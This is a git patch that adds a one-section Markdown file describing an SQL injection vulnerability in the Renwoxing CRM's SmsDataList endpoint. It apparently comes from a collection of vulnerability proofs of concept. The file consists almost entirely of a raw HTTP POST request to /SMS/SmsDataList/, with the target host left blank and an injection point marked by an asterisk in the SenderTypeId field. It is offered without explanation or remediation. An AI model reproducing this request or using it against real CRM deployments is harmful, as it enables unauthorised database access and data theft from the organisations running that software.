From c51ad27a7608519f9b3439f907ac671e8f2f4f00 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:35:03 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=BB=BB=E6=88=91=E8=A1=8C=20CRM=20Sm?= =?UTF-8?q?sDataList=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 任我行 CRM SmsDataList SQL注入漏洞.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 任我行 CRM SmsDataList SQL注入漏洞.md diff --git a/任我行 CRM SmsDataList SQL注入漏洞.md b/任我行 CRM SmsDataList SQL注入漏洞.md new file mode 100644 index 0000000..ce5115e --- /dev/null +++ b/任我行 CRM SmsDataList SQL注入漏洞.md @@ -0,0 +1,14 @@ +## 任我行 CRM SmsDataList SQL注入漏洞 +``` +POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 170 + +Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000* + +```